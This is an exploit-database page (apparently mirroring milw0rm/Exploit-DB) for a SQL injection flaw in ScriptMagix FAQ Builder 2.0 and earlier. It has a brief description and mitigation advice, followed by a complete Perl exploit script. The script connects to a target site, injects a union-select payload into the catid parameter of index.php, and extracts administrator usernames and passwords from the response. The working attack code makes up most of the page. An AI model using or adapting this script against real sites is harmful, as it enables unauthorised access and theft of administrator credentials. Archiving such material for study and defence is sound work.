ScriptMagix FAQ Builder - exploit.company

vendor:

FAQ Builder

by:

ajann

7.5

CVSS

HIGH

Remote Blind SQL Injection

CWE

Product Name: FAQ Builder

Affected Version From: <=2.0

Affected Version To: 2

Patch Exists: NO

Related CWE:

CPE: a:scriptmagix:faq_builder:2.0

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

ScriptMagix FAQ Builder <= 2.0 (index.php) Remote Blind SQL Injection Exploit

This exploit allows an attacker to perform a blind SQL injection attack on the ScriptMagix FAQ Builder version 2.0 or lower. By exploiting this vulnerability, the attacker can extract sensitive information such as usernames and passwords from the admin database.

Mitigation:

Update to a version higher than 2.0 or apply a patch if available. Ensure input validation and sanitization techniques are implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#[Script Name: ScriptMagix FAQ Builder <= 2.0 (index.php) Remote Blind SQL Injection Exploit
#[Coded by   : ajann
#[Author     : ajann
#[Contact    : :(
#[S.Page     : http://www.scriptmagix.com
#[$$         : 50$
#[..         : ajann,Turkey

use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[//   	ScriptMagix FAQ Builder <= 2.0 (index.php) Remote Blind SQL Injection Exploit
[//                   Usage: exploit.pl [target]
[//                   Example: exploit.pl victim.com
[//                   Example: exploit.pl victim.com
[//                           Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/index.php?cmd=2&catid=";

print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);

if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}

if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
 }


$target = "-1%20union%20select%200,1,2,3,4,5,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),7,8,0,0,0,0,0,0%20from%20admin/*";
$target = $host.$dir.$file.$target;

#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}

if ($answer =~ /password:(.*?)<br>/){
print "+ Password: $1\n";
}

if ($answer =~ /Syntax error/) { 
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit(); 
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : (  \n";
print "+**********************************************************************+\n";
exit(); 
}
 }

# milw0rm.com [2007-03-18]